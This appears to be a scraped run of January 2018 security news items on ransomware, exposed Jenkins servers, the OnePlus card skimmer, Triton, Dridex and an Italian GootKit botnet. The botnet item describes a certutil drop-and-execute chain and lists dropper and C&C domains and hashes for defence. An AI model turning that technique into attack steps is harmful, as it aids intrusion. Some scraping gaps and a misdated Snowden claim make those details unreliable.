“The hackers targeted more than 1,400 files, the names of every one temporarily changed to “I’m sorry.” They gave the hospital seven days to pay or the files would be permanently encrypted, officials said.”

In at least three attacks the ransomware locked files and dropped a ransom note with the names “sorry,” a circumstance that suggests an ongoing malware campaign launched by the same threat actor.

Hackers use to scan the Internet for machines with open RDP connections, then they attempt to hack using brute-force attacks.

SamSam%20ransomware%20note

“Bleeping Computer has tracked down this ransom note to recent SamSam infections. According to data provided by the ID-Ransomware service, there have been 17 submissions of SamSam-related files to the service in January alone.” continues Bleeping Computers.

The analysis of Bitcoin address reported in the ransom note shows crooks made nearly 26 Bitcoin (roughly $300,000), the first payment made by one of the victims is date back December 25.


Researchers found misconfigured Jenkins servers leaking sensitive data
21.1.2018 securityaffairs Security

Security expert Mikail Tunç analyzed Jenkins servers exposed online discovering that many instances leak sensitive information.
The researchers clarify that he did not exploit any vulnerabilities to gain access to Jenkins servers, he simply analyzed open ones.

Jenkins is the most popular open source automation server, it is maintained by CloudBees and the Jenkins community.

The automation server supports developers build, test and deploy their applications, it has more than 133,000 active installations worldwide with more than 1 million users.

The researcher used the Shodan search engine to find Jenkins servers accessible online, he discovered roughly 25,000 instances. The analysis of approximately half of them revealed that 10-20% were misconfigured, then the researchers manually analyzed each of them and notified affected vendors.

Tunç highlighted that Jenkins typically requires credentials to the code repository and access to an environment in which to deploy the code, usually GitHub, AWS, and Azure. Failure to configure the application correctly can expose data to serious risk.

The researcher discovered that many misconfigured systems provided guest or administrator permissions by default, while others allowed guest or admin access to anyone who registered an account.

Jenkins%20servers

Tunç also found some Jenkins servers that implemented SAML/OAuth authentication system linked to Github or Bitbucket, unfortunately, they allowed any GitHub or Bitbucket account to log in rather than legitimate owners.

“Misconfigured in this context means any one of the following:

Wide open to the internet with either guest or administrative permissions by default – guest can be just as catastrophic and damaging as having admin rights
The web application was behind a log-in prompt but allowed ‘self-registration’ which granted guest or admin rights
The web application was behind a SAML/OAuth log-in linked to Github or Bitbucket but was misconfigured to allow anyGithub/Bitbucket account to log-in to Jenkins rather than being locked down to the organisation’s user pool
” wrote the expert in a blog post.

Tunç reported that almost all of the misconfigured instances he analyzed also leaked sensitive information, including credentials for private source code repositories, credentials for deployment environments (e.g. usernames, passwords, private keys and AWS tokens), and job log files that included credentials and other sensitive data.

The researcher also found Google had exposed sensitive tokens on their Jenkins instance, the company promptly solved the problem after being informed via its bug bounty program.

Other instances discovered by the experts that belong to major organizations are:

London’s government-funded transport body Transport for London;
Supermarkets Sainsbury’s and Tesco;
A company who manufacturers toys for children;
Credit checking company ClearScore;
Newspaper publisher News UK;
educational publisher Pearson, and newspaper publisher News UK.
“It’s 2018 and most organisations don’t have the most basic of responsible disclosure processes in place. Surprisingly (or not) big names fall foul of this problem too.” concluded the researcher.

“If you work in InfoSec or are responsible for the security of your infrastructure, now’s a good time to methodically crawl through your infrastructure to ensure you’re not unknowingly exposing sensitive interfaces to the internet. It only takes one misconfigured instance to destroy your business.”


OnePlus admitted hackers stole credit card information belonging to up to 40,000 customers
21.1.2018 securityaffairs Incindent

OnePlus confirmed that a security breach affected its online payment system, hackers stole credit card information belonging to up to 40,000 customers.
OnePlus confirmed that a security breach affected its online payment system, a few days ago many customers of the Chinese smartphone manufacturer claimed to have been the victim of fraudulent credit card transactions after making purchases on the company web store.

OnePlus has finally confirmed that its online payment system was breached, following several complaints of from its customers who made purchases on the company’s official website.
OnePlus%20Payment-Page-1024x579
Dozens of cases were reported through the and on , the circumstance that credit cards had been compromised after customers bought a smartphone or some accessories from the OnePlus official website suggests it was compromised by attackers.

On January 19, the company released a statement to admit the theft of credit card information belonging to up to 40,000 customers. The hacker stole the credit card information between mid-November 2017 and January 11, 2018 by injecting a malicious script into the payment page code.

The script was used by attackers to sniff out credit card information while it was being entered by the users purchasing on the web store.

“We are deeply sorry to announce that we have indeed been attacked, and up to 40k users at oneplus.net may be affected by the incident. We have sent out an email to all possibly affected users.” reads the statement.
“One of our systems was attacked, and a malicious script was injected into the payment page code to sniff out credit card info while it was being entered. The malicious script operated intermittently, capturing and sending data directly from the user’s browser. It has since been eliminated.”

OnePlus is still investigating the breach to determine how the hackers have injected the malicious script into its servers.

The script was used to sniff out full credit card information, including card numbers, expiry dates, and security codes, directly from a customer’s browser window.

OnePlus said that it has quarantined the infected server and enhanced the security of its systems.

Clients that used their saved credit card, PayPal account or the “Credit Card via PayPal” method are not affected by the security breach.

As a precaution, the company is temporarily disabling credit card payments at , clients can still pay using PayPal. The company said it is currently exploring alternative secure payment options with our service providers.

OnePlus is notifying all possibly affected OnePlus customers via an email.

“We are eternally grateful to have such a vigilant and informed the community, and it pains us to let you down. We are in contact with potentially affected customers. We are working with our providers and local authorities to address the incident better,” continues the statement.


Crackas leader (15) gained access to data of intel operations in Afghanistan and Iran by posing as the CIA chief
20.1.2018 securityaffairs BigBrothers

British teenager Kane Gamble (15), leader of the ‘Crackas With Attitude’ hacking group gained access to intel operations in Afghanistan and Iran by posing as the CIA chief.
Do you remember “Crackas With Attitude”?

You remember for sure the Crackas With Attitude, a hacking crew that claimed clamorous actions in support of the Palestine cause.

The notorious group is responsible for clamorous attacks against US intelligence officials, the list of targeted victims is long and includes James Clapper, the Director of National Intelligence under President Obama’s administration and the deputy director of the FBI Jeh Johnson, CIA director John Brennan.

Cracka is also responsible for the disclosure of personal information of 31,000 government agents, including data of FBI agents, Department of Homeland Security (DHS) officers and DoJ employees.

crackas%20Kane%20Gamble

Cracka used the account “@DotGovz” on Twitter to publish online the sensitive data.

The Cracka with Attitude team always expressed its support to Palestine, they hacked US Government entities due to its support to the Israeli politics.

The group was lead by a British teenager, Kane Gamble, that was 15-years-old at the time of the hack of CIA director.

According to prosecutors, Kane Gamble accessed secret data related to intelligence operations in Afghanistan and Iran by pretending to be head of CIA.

“He accessed some extremely sensitive accounts referring to, among other things, military operations and intelligence operations in Afghanistan and Iran.” said John Lloyd-Jones QC prosecutor.

crackas%20Kane%20Gamble

Gamble was arrested in February 2016, in October 2017, Kane Gamble pleaded guilty to ten charges related to the attempted intrusions occurred between late 2015 and early 2016.

Two other members of Crackas With Attitude team, Andrew Otto Boggs and Justin Gray Liverman, were arrested by FBI in September 2016 and had already been sentenced to five years in federal prison.

Gamble pleaded guilty to eight charges of performing a function with intent to gain unauthorized access, and two charges of unauthorized acts with intent to compromise the operation of a computer.

“It all started by me getting more and more annoyed at how corrupt and cold-blooded the US Government is so I decided to do something about it.” Gamble told a journalist.

“The court heard Gamble “felt particularly strongly” about US-backed Israeli violence against Palestinians, the shooting of black people by US police, racist violence by the KKK and the bombing of civilians in Iraq and Syria.” reported The Sun.

Gamble’s advocate sustained that Gamble he is on the autism spectrum at the time of his offending had the mental development of a teenager.

“Medical experts for the defence argue that he is on the autism spectrum and at the time of his offending had the mental development of a 12 or 13-year-old.” reported The Telegraph.

“He has no friends to speak off and is closest to his mother Ann, a cleaner who reportedly won a £1.6million lottery jackpot in 1997 but “lost all the money on doomed property deals”.

William Harbage QC said that after his arrest he told doctors “it was kind of easy” and that he had little consequences of his actions “in his bedroom on the internet thousands of miles away”. “

The teenager is waiting for the final sentence.


The US Global surveillance bill has been signed by President Trump
20.1.2018 securityaffairs BigBrothers

US Government missed a historic opportunity to reform a dangerous surveillance law that opens to a global surveillance, instead it has signed a version that makes it worse.
The U.S. legal framework related to the domestic surveillance has been signed by President Trump one day after the Senate approved it with 65 votes against 34. The bill will be effective for other six years, below the Edward Snowden’s comment:


Edward Snowden

@Snowden
65 Senators just voted to expand an unconstitutional law permitting Trump to spy on communications with one leg in the US–without a warrant. For the next six years, any unencrypted internet request that even touches a US border will be "ingested" (intercepted) and parsed by NSA. https://twitter.com/EFF/status/954048766000087041 …

7:56 PM - Jan 18, 2018
359 359 Replies 7,305 7,305 Retweets 7,843 7,843 likes
Twitter Ads info and privacy
Privacy advocates and civil rights have a long criticized the Section 702 of the Foreign Intelligence Surveillance Act (FISA) that allows US intelligence agencies to conduct domestic surveillance under certain conditions without a warrant.

The Section 702 allows the NSA to conduct warrantless spying of foreigners located abroad, including any communications with US citizens.

NSA%20surveillance%20activities

Section 702 was revealed by NSA whistleblower Edward Snowden in 2012. Civil rights and privacy advocates consider it as unconstitutional under the Fourth Amendment.

The bill increases spying powers of intelligence agencies and block safeguards, curiously it was passed by Republicans who always criticized the corruption of the Government.

Politicians that voted for the Section 702 believe it is crucial it is crucial to protect Americans from foreign governments and terrorism, they highlighted that the revisions to the bill will guarantee citizens from any abuse.
“There is a glimmer of light,” “The last few weeks have demonstrated that bipartisan efforts to reform our surveillance laws continue on an arc of progress.” wrote ACLU legislative counsel Neema Singh Guliani in a blog post.

“With only two more votes, reformers could have halted this bill from advancing and forced a floor debate over badly needed improvements. And an effort to pass the most comprehensive Section 702 reform bill introduced in Congress garnered the support of over 180 members in the House. With actual debate, real reform provisions likely would have passed.”

Just hours before the section 702 program was signed by the President, the Senate’s intelligence committee approved the release of a confidential four-page memo alleging previous abuse of the FISA spying program to the rest of Congress.

“Scores of Republicans have since viewed the document in a Sensitive Compartmented Information Facility on Capitol Hill. They left expressing shock, saying the special counsel investigation into whether Trump’s campaign officials had improper contacts with Russia is based on politically motivated actions at the highest level of law enforcement.” reported The Hill.

House Freedom Caucus Chairman Mark Meadows (R-N.C.) called the memo “shocking.”

““I’m here to tell all of a America tonight that I’m shocked to read exactly what has taken place,” Meadows (R-N.C.) said in a speech on the House floor.

“I thought it could never happen in a country that loves freedom and democracy like this country. It is time that we become transparent with all of this, and I’m calling on our leadership to make this available so all Americans can judge for themselves.”

Politicians opposing the section 702 program are defining its contents “worse than Watergate.”

In conclusion, this is a black page in the history of Americans. The 6-year extension of the regulation that allows the US government to monitor foreigners’ communications abroad without a warrant has been approved. Moreover, the US intelligence will also be able to spy on American citizens, politicians, businessmen, and journalists who communicate with them, despite the Fourth Amendment.


Red Hat reverts Spectre (CVE-2017-5715) security updates due to boot issues reported by customers
20.1.2018 securityaffairs

Red Hat is going to release updates that are reverting previous patches for the Spectre vulnerability (Variant 2, aka CVE-2017-5715).
Just after the release of Spectre and Meltdown patches many experts argued a significative impact on performance and stability of systems running them.

While Meltdown and Spectre Variant 1 could be theoretically being addressed by patching the OS, Spectre Variant 2 require a firmware/microcode update to address the issue.

Now Red Hat joint to the list of companies that observed problems after the installation of the patches, it is releasing updates that are reverting previous patches for the Spectre vulnerability (Variant 2, aka CVE-2017-5715).

The company decided to revert the initial security updates because it received from some customers complaints about booting failure for their systems.

Red Hat is recommending its customers to contact their OEM hardware provider to receive the latest release of firmware to mitigate the CVE-2017-5715.

“Red Hat Security is currently recommending that subscribers contact their CPU OEM vendor to download the latest microcode/firmware for their processor.” reads the advisory published by Red Hat.

“The latest microcode_ctl and linux-firmware packages from Red Hat do not include resolutions to the CVE-2017-5715 (variant 2) exploit. Red Hat is no longer providing microcode to address Spectre, variant 2, due to instabilities introduced that are causing customer systems to not boot. The latest microcode_ctl and linux-firmware packages are reverting these unstable microprocessor firmware changes to versions that were known to be stable and well tested, released prior to the Spectre/Meltdown embargo lift date on Jan 3rd. Customers are advised to contact their silicon vendor to get the latest microcode for their particular processor.”

CVE-2017-5715

Other distributions based on Red Hat Enterprise Linux like CentOS could suffer similar problems and it could be necessary to revert Spectre Variant 2 security updates.

The company suggests customers to access the Red Hat Customer Portal Lab App to verify systems have the necessary microprocessor firmware to address CVE-2017-5715 (variant 2):

Red Hat Customer Portal Labs – Spectre And Meltdown Detector


Italian companies and Ministry of the Interior under attack, experts spotted a huge botnet
20.1.2018 securityaffairs BotNet

Threat actors with a deep knowledge of the Fiscal Italian ecosystem are using a huge botnet to target Italian companies and Ministry of the Interior.
On Januaty 18 a colleague of mine (Luca) called me telling a malicious email was targeting Italian companies. This is the beginning of our new analysis adventure that Luca and I run together.

The email pretended to be sent by “Ministero dell’ Economia e delle Finanze” the Italian Department of Treasury and it had smart subjects such as:

Codici Tributo Acconti
F24 Acconti-Codice Tributo 4034
The attacker knows very well the Italian Fiscal Year since those modules are very popular from company administration employees at that time. The attacker would probably exploit this attack path reaching out as many companies as possible. The email address was not coming from the “Ministero dell’ economia e delle Finanze” at all, it was coming from the following addresses:

info@amber-kate.com
info@fallriverproductions.com
The email looks like :

Huge%20Botnet%20Attacking%20Italian%20Companies
Malicious eMail
A simple link pointing to a high reputation domain was popping out the default browser and downloading the following Javascript file. The high level of obfuscation and the way the content was provided was so suspicious to be worth to follow the analysis.


Infection: Stage 1 Obfuscated
After a deobfuscation phase the javascript looked much more easy te be read from a human side.


Infection: Stage 1 Clear Text
A romantic “drop and execute” section was happening. A GET connection to 239outdoors.com/themes5.php was dropping a file named 1t.exe and later on the same script was able to execute the dropped file. The file 1t.exe was running on the victim machine contacting the Command and Control waiting for further commands.

The new sample looks like GootKit, a weaponized version of Banker Malware. The malware installs itself and contacts Command and Control asking “what to do” and sending the “stolen credentials” directly to the Command and Control server. Details on IPs, Persistencies and so on, is provided in the IoC section, but today’s we won’t describe GootKit, we got access to the Dropping site!

We want to figure out if we might help victims to deactivate the malicious botnet by providing as much as possible details without focusing on the reverse the Malware per se since appears to be known.

By getting further analyzing the dropping website we immediately understood that the same URL was dropping another threat. The parallel threat the dropping website was spreading to the world was called “Nuovo Documento 2008” and it was a .bat file as follows.


New Threat Stage 1
That executable .bat file on a first stage opens up a browser pointing to a legitimate image but later on, it uses a notorious technique called “certutil for delivery of file” to drop and execute another file. This technique is well described here by carnal0wnage. Basically, the attacker uses the certutil.exe program do download a Base64 encoded payload, to decode it and to run it. This technique is very silent since the User-Agent of certutils.exe is not suspicious because it needs to connect outside the company networks to check certificates, so not much IPS rules on it. The dropped file name unslss.exe appears to be very close to the previously analyzed one (1t.exe) it contacts the same C&C and it behaves in a similar way. But again we won’t focus on reverse such a malware but rather we wont be able to reach the highest number of IoC to protect as much as possible the victims. By analyzing the Dropping website we founded that a significative number of connections had additional referrers, so we decided to focus our attention on how many DNS were pointing to such a domain. We did it and the result was quite impressive (please see the Dropping URLs IoC Section).

Following the research on the dropping website, we found an interesting log of all the connection coming from possible victims. We collected that log, and we built the following possible infection list (possible Victims). We won’t publish the Victims IP addresses but if you can prove you are legitimated by your company to ask that logs we can give you (for free, of course) the IP addresses we’ve found related to your company. A detailed list of possible infected networks follows.

Possible Victims:

ACI informatica s.p.a.
AGOS-AS
AGSM Verona Spa
ASGARR Consortium GARR
Acantho S.p.a
Alfanews S.r.l.
Ambrogio s.r.l.
Asco TLC S.p.A.
Autostrade-as
BT Italia
BT Italia S.p.A.
Banca Monte Dei Paschi Di Siena S.P.A.
Brennercom S.p.A.
COLT Technology Services Group Limited
Camera dei deputati
Cesena Net srl
Clouditalia Telecomunicazioni S.p.A.
Comune Di Brescia
Comune di Bologna
Consortium GARR
Consorzio per il Sistema Informativo
Costacrociere-as
Duebite-as
E4A s.r.l.
Energente S.r.l.
FASTNET SpA
FASTWEB SPA
FINECO Banca del Gruppo Unicredit
Fastweb
Forcepoint Cloud Ltd
GenyCommunications
Global Com Basilicata s.r.l.
H3G Italy
Hynet S.R.L.
IBSNAZ
ICT Valle Umbra s.r.l.
InAsset S.r.l.
InfoCamere SCpA
Infracom Italia S.p.A.
Inrete s.r.l
Insiel- Informatica per il sistema degli enti loca
Integrys.it di Stefania Peragna impresa individual
Intred S.p.A.
KPNQWest Italia S.p.a.
LEPIDA
Lepida S.p.A.
Liguria Digitale S.C.p.A.
Linea Com S R L
Linkem spa
Lombardia Informatica S.p.A.
Mandarin S.p.A.
Mc-link SpA
Metrolink S.R.L.
Ministero dell’Interno
Mnet srl
NGI SpA
Nemo S.r.l.
Nordcom S.p.a.
Officine Informatiche Srl
Progetto Evo S.r.l.
Provincia di Reggio nell’Emilia
Qcom spa
Raiffeisen OnLine GmbH
Regione Basilicata
Regione Toscana
Regione Veneto
STI ADSL
Sardegnait-as
Societa’ Gestione Servizi Bp S.p.A.
TELEX S.r.l.
TWT S.p.A.
Telecom Italia
Terra S.p.a.
Time-net S.r.l.
Tiscali SpA
Trenitalia SpA
Trentino Network S.r.l.
Universita’ degli Studi di Milano
Venis S.p.A.
Videotime SPA
Vodafone Group Services GmbH
Vodafone Italia DSL
Vodafone Omnitel B.V.
Vodafone Omnitel N.v.
WIIT S.p.A.
Welcome Italia S.p.A
Wind Telecomunicazioni
Wind Telecomunicazioni SpA
Following the found IoC provided by the long “analysis journey”. I managed this analysis over the night, so I am sure there would be some imprecisions, but I preferred to speed up the entire analysis process to give the opportunity to block such infamous threat as soon as possible.

Hope it helps the community.

IoC:

eMail:
info@amber-kate.com
info@fallriverproductions.com
Dropping URLS:
185.61.152.71
239outdoors.com
bentlabel.com
cdvdautomator.com
cloudblueprintprogram.com
cnchalftone.com
comedyyall.com
conticellolaw.com
couplesdoingbusiness.com
dvoper.com
equinnex.com
ericandchrissy.com
evelynleekley.com
expungementstennessee.com
flaveme.com
grkisland.com
healingfoodconsulting.com
hertzsynergy.com
hollywoodisruption.com
home-sphere.com
integrativenutritiontherapy.com
jdkanyuk.com
kineloveclips.com
kylesinger.com
legionchristmas.com
menshoesonlinestore.com
microtiasurgery.com
movielotbar.com
muiienweg.com
niarhoslondon.com
opsantorinitours.com
progunjobs.com
rocketpak.com
scottishwindowsolutions.com
silkygames.com
snapshotsandwhatnots.com
snotterkind.com
solespin.com
strangerthanchristmas.com
synchronr.com
taramadden.com
terento.website
theargumint.com
thegildedwren.com
thejourneytogodsheart.com
thesaltybody.com
topsantorinitours.com
tuftandneedles.com
videospanishlessons.com
vovachka.com
wall-runners.com
war-arena.com
www.scottishwindowsolutions.com
z1logistics.com
zayantetinyhomes.com
zefeed.com
Command and Controls
185.44.105.97
ns15.dreamsinthesun.com
bdi2.nomadicdecorator.com
elis.k9redemptionrescue.com
api.hailstorm360.com
cerera.survivalbid.com
mark.k9redemptionrescue.org
nsc.dayswithsunrays.com
at.moonbeammagic.com
ssl.vci-cfo.com
sip3.propertiesandprojects.com
host1.jodiray.com
note.lawrencechoy.com
note.lawrencechoy.com:80
185.44.105.97:80/200
note.lawrencechoy.com:80
Hashes
63d6927881d4978da4e162c17d82e9c009d0a93e
7ea33f51b6c4aa54beee7fd878886339c22d2232
8cae0dc9255978a35cfd8db64cbe80001400de9b
839ff9f4c3980ac67d4cbef296520ee364a0911f
8cae0dc9255978a35cfd8db64cbe80001400de9b


Triton Malware exploited a Zero-Day flaw in Schneider Triconex SIS controllers
20.1.2018 securityaffairs
Virus

The industrial giant Schneider discovered that the Triton malware exploited a zero-day vulnerability in Triconex Safety Instrumented System (SIS) controllers in an attack aimed at a critical infrastructure organization.
In December 2017, a new malicious code dubbed Triton malware (aka Trisis) was discovered by researchers at FireEye, it was specifically designed to target industrial control systems (ICS) system.

Security experts at CyberX who analyzed samples of the malware provided further details on the attack, revealing that Triton was likely developed by Iran and used to target an organization in Saudi Arabia.

Triton%20malware

The Triton malware is designed to target Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers that are used in industrial environments to monitor the state of a process and restore it to a safe state or safely shut it down if parameters indicate a potentially hazardous situation.

TRITON is designed to communicate using the proprietary TriStation protocol which is not publicly documented, this implies that the attackers reverse engineered the protocol to carry out the attack.

Initial analysis conducted by Schneider excluded that hackers may have leveraged any vulnerabilities in the target products, but now the vendor has discovered that Triton malware exploited a flaw in older versions of the Triconex Tricon system.

Schneider confirmed the presence of a flaw only in a small number of older versions and plans to release security updates that address it in the next weeks.

Schneider also announced that it is developing an application to detects the presence of the malware on a controller and removes it.

Anyway, Schneider pointed out that the root cause of the success of the Triton malware is that victims failed in implementing best practices and security procedures.

Just after the disclosure of the attack, Schneider published a security advisory to warn its customers and recommended to avoid leaving the front panel key position in “Program” mode when the controller is not being configured. The malicious code can only deliver its payload if the key switch is set to this mode.

“Schneider Electric is aware of a directed incident targeting a single customer’s Triconex Tricon safety shutdown system. We are working closely with our customer, independent cybersecurity organizations and ICSCERT to investigate and mitigate the risks of this type of attack.” reads the security advisory.

“The modules of this malware are designed to disrupt Triconex safety controllers, which are used widely in critical infrastructure. The malware requires the keyswitch to be in the “PROGRAM” mode in order to deliver its payload. Among others, the reported malware has the capability to scan and map the industrial control system environment to provide reconnaissance and issue commands directly to Tricon safety controllers.”

Schneider advised customers to implement the instructions in the “Security Considerations” section of the Triconex documentation.


OnePlus confirms up to 40,000 customers affected by Credit Card Breach
20.1.2018 thehackernews  Incindent

OnePlus has finally confirmed that its online payment system was breached, following several complaints of fraudulent credit card transactions from its customers who made purchases on the company's official website.
In a statement released today, Chinese smartphone manufacturer admitted that credit card information belonging to up to 40,000 customers was stolen by an unknown hacker between mid-November 2017 and January 11, 2018.
According to the company, the attacker targeted one of its systems and injected a malicious script into the payment page code in an effort to sniff out credit card information while it was being entered by the users on the site for making payments.
The malicious script was able to capture full credit card information, including their card numbers, expiry dates, and security codes, directly from a customer’s browser window.
"The malicious script operated intermittently, capturing and sending data directly from the user's browser. It has since been eliminated," OnePlus said on its official forum. "We have quarantined the infected server and reinforced all relevant system structures."
However, the company believes users who shopped on its website using their saved credit card, PayPal account or the "Credit Card via PayPal" method are not affected by the breach.
OnePlus is still investigating the incident and committed to conducting an in-depth security audit to identify how hackers successfully managed to inject the malicious script into its servers.
Meanwhile, credit card payments will remain disabled on the OnePlus.net store until the investigation is complete as a precaution, though users can make purchases through PayPal.
"We are eternally grateful to have such a vigilant and informed the community, and it pains us to let you down. We are in contact with potentially affected customers. We are working with our providers and local authorities to address the incident better," OnePlus says.
OnePlus is notifying all possibly affected OnePlus customers via an email and advises them to keep a close eye on their bank account statements for any fraudulent charges or look into cancelling their payment card.
The company is also looking into offering a one-year subscription of credit monitoring service for free to all affected customers.


Man Admits to DDoS-ing Employers, Competitors
19.1.2018 securityweek Crime
A New Mexico man admitted in court this week to launching distributed denial of service (DDoS) attacks against the websites of former employers, business competitors, and public services.

The culprit, John Kelsey Gammell, 55, pleaded guilty to one count of conspiracy to commit intentional damage to a protected computer, admitting to launching DDoS attacks on websites in the United States, from at least in or about July 2015 through in or about March 2017. He also pleaded guilty to two counts of being a felon-in-possession of a firearm.

The DDoS attacks were aimed at numerous websites, including domains operated by companies Gammell used to work for or of those that declined to hire him. He also targeted competitors of his business and websites for law enforcement agencies and courts, among others.

Gammell admitted to using programs on his own computers and to purchasing the services of “DDoS-for-hire” companies to launch the DDoS attacks. He purchased the services of companies such as VDoS, CStress, Inboot, Booter.xyz and IPStresser, the Department of Justice reveals.

Some of the victims he targeted include Washburn Computer Group, the Minnesota State Courts, Dakota County Technical College, Minneapolis Community and Technical College, the Hennepin County Sheriff’s Office, among others.

To avoid detection, he used IP address anonymization services, paid for the DDoS-for-hire services using cryptocurrency, used spoofed emails to conceal his conduct, and employed encryption and drive-cleaning tools to conceal digital evidence. To circumvent his victims’ DDoS attack mitigation efforts, Gammell amplified his attacks by using multiple DDoS-for-hire services at once.

Gammell is a convicted felon prohibited from possessing firearms or ammunition. He also admitted to possessing multiple firearms, ammunition, and parts for use in the building of firearms and ammunition. His sentence is scheduled for a later date.


Dridex Campaign Abuses FTP Servers
19.1.2018 securityweek
Virus
A recently observed email campaign is abusing compromised FTP servers as download locations for malicious documents and infecting users with the Dridex banking Trojan, Forcepoint has discovered.

Dridex has been one of the most prolific banking Trojans over the past several years, with the actors behind it constantly adopting new techniques and improving their malware for increased efficiency. The malware is focused on stealing user’s online banking credentials to perform financial fraud.

Malicious emails distributed as part of the new campaign were observed on January 17, 2018, primarily sent to .com top level domains (TDLs). Analysis of the top affected TDLs revealed that major regional targets included France, the UK, and Australia.

The emails were sent from compromised accounts, where the sender names were rotated around a list of names, in an attempt to make the emails look more convincing to unsuspecting recipients, Forcepoint reveals.

The malicious actor(s) behind the attack used two types of malicious documents as delivery mechanisms, namely a Word document abusing Dynamic Data Exchange (DDE) for malware execution, and a XLS file with macro code to fetch the banking Trojan.

The compromised servers abused in this campaign don’t appear to be running the same FTP software, and the security researchers believe that the attackers obtained the login credentials as part of other attacks.

“The perpetrators of the campaign do not appear to be worried about exposing the credentials of the FTP sites they abuse, potentially exposing the already-compromised sites to further abuse by other groups. This may suggest that the attackers have an abundant supply of compromised accounts and therefore view these assets as disposable,” Forcepoint notes.

The emails sent in this campaign appear to come from the Necurs botnet, currently considered the largest spam botnet out there. The domains used for distribution were associated with other Necurs campaigns and the document downloaders are similar to those used by the botnet before. Furthermore, Necurs is known to have distributed Dridex for a long time.

What Forcepoint noticed regarding this campaign, however, was that the spam volume was very low compared to typical Necurs campaigns. Only around 9,500 emails were observed in this attack, while normal Necurs campaigns involve millions of emails. The use of FTP servers for download is also new.

“Cybercriminals constantly update their attack methods to try and ensure maximum infection rates. In this case FTP sites were used, perhaps in an attempt to prevent being detected by email gateways and network policies that may consider FTPs as trusted locations. The presence of FTP credentials in the emails highlights the importance of regularly updating passwords,” Forcepoint notes.


Firms More Open to Receiving Vulnerability Reports: Ethical Hackers
19.1.2018 securityweek
Vulnerebility
Companies have become more open in the past year to receiving vulnerability reports from security researchers, according to ethical hackers surveyed by bug bounty platform HackerOne.

According to HackerOne’s 2018 Hacker Report, which surveyed nearly 2,000 white hat hackers across 100 countries, companies are somewhat more open (38%) or far more open (34%) to receiving vulnerability reports. Only less than 10% of respondents said firms are less open.

On the other hand, nearly a quarter of respondents said they had not reported vulnerabilities due to the fact that the affected software’s developer had not provided a channel for responsible disclosure.

When it comes to motivation, money is not the most important – as it was in the previous year. There are more researchers hacking to learn new techniques (14.7%), for fun (14%), and for the challenge (14%) than ones who do it for the money (13.1%). Nearly one-quarter of respondents said they donated money earned from bug bounties to charities.

A majority of HackerOne users named websites as their favorite target (70%), followed by APIs (7.5%), Android apps (4.2%), operating systems (3.1%), and IoT systems (2.6%).

How%20white%20hats%20choose%20who%20to%20hack

Burp Suite is the favorite tool of nearly one-third of hackers, but more than 15% claim they use their own tools to find vulnerabilities. Other popular tools include web proxies and scanners, network scanners, fuzzers, and debuggers.

A vast majority of the white hats who have signed up on the HackerOne platform, which hosts the bug bounty programs of more than 1,000 organizations, are under the age of 35, and many of them learned how to hack on their own. Most of them either work in IT (software or hardware), consulting, or they are students.

Roughly 66% spend less than 20 hours per week hacking, and only 13% spend 40 hours or more. More than 71% have less than 5 years experience, and only 10% have been hacking for more than 10 years.

Over $23 million have been paid out through HackerOne, with more than $4 million paid to researchers in the U.S., $3 million to India, and $1.3 million each to Australia and Russia. The largest chunk came from companies in the United States ($16 million) and Canada ($1.2 million).

In some places, bug bounty hunters earn far more than they would as a software engineer in their country. For example, in India and Argentina they earn roughly 16 times more than the median annual wage of a software engineer, while in Hong Kong and Egypt they earn 8 times more.

A quarter of respondents said bug bounties represent at least half of their annual income and 14% said they represent 90-100% of their income. Three percent reported making more than $100,000 per year from bug bounty programs, and 1% make more than $350,000.


Misconfigured Jenkins Servers Leak Sensitive Data
19.1.2018 securityweek Analysis
A researcher has conducted an analysis of Jenkins servers and found that many of them leak sensitive information, including ones belonging to high-profile companies.

London-based researcher Mikail Tunç used the Shodan search engine to find Jenkins servers accessible from the Internet and discovered roughly 25,000 instances.

The expert analyzed approximately half of them and determined that 10-20% were misconfigured. He spent weeks manually validating the issues he discovered and notifying affected vendors.

Jenkins is an open source automation server used by software developers for continuous integration and delivery. Since the product is typically linked to a code repository such as GitHub and a cloud environment such as AWS or Azure, failure to configure the application correctly can pose a serious security risk.

Some of the misconfigured systems discovered by Tunç provided guest or administrator permissions by default, while others allowed guest or admin access to anyone who registered an account. Some Jenkins servers used a SAML/OAuth authentication system linked to Github or Bitbucket, but they allowed any GitHub or Bitbucket account to log in rather than just accounts owned by the organization.

Tunc said a vast majority of the misconfigured Jenkins servers leaked some type of sensitive information, including credentials for private source code repositories, credentials for deployment environments (e.g. usernames, passwords, private keys and AWS tokens), and job log files that included credentials and other sensitive data.

One of the exposed Jenkins instances, which leaked sensitive tokens, belonged to Google, but the tech giant quickly addressed the issue after being informed via its bug bounty program.

The researcher also named several major UK-based companies, including Transport for London, supermarkets Sainsbury’s and Tesco, credit checking company ClearScore, educational publisher Pearson, and newspaper publisher News UK. Some of these companies allegedly exposed highly sensitive data, but Tunç said he often had difficulties in responsibly disclosing his findings.

“I want to make it absolutely clear that I did not exploit any vulnerabilities to gain access to Jenkins servers – I simply walked through the front door which was visible to the world, then told the owners to close said front door,” the researcher noted in a blog post.

While Tunç received products, vouchers and thanks for his work from the companies he alerted, misconfigured Jenkins instances can be highly problematic and some vendors have paid significant bug bounties for such security holes.

A few months ago, two researchers reported earning a total of $20,000 from Snapchat after finding exposed Jenkins instances that allowed arbitrary code execution and access to sensitive data.


Experts uncovered a new campaign abusing FTP servers to deliver Dridex Banking Trojan
19.1.2018 securityaffairs
Virus

Security researchers at Forcepoint have spotted a new spam campaign that is abusing compromised FTP servers as a repository for malicious documents and infecting users with the Dridex banking Trojan.
The Dridex banking Trojan is a long-running malware that has been continuously improved across the years.

The malicious email campaign was first noticed by Forcepoint on January 17, 2018, the messages were primarily sent to .com top level domains (TDLs) most of them in France, the UK, and Australia.

“The sender domains used are observed to be compromised accounts. The sender names rotated around the following names, perhaps to make the emails look more convincing to unsuspecting recipients: admin@, billing@, help@, info@, mail@, no-reply@, sale@, support@, ticket@.” reads the analysis published by Forcepoint.

Attackers used at least two types of weaponized documents, one of them is a Word document abusing DDE protocol for malware execution, and an XLS file with macro code that download the Dridex banking Trojan from a compromised server.

Dridex%20banking%20Trojan

According to the experts, the attackers obtained in some way the login credentials to compromise the servers used in this campaign.

“The compromised servers do not appear to be running the same FTP software; as such, it seems likely that the credentials were compromised in some other way.” states Forcepoint.

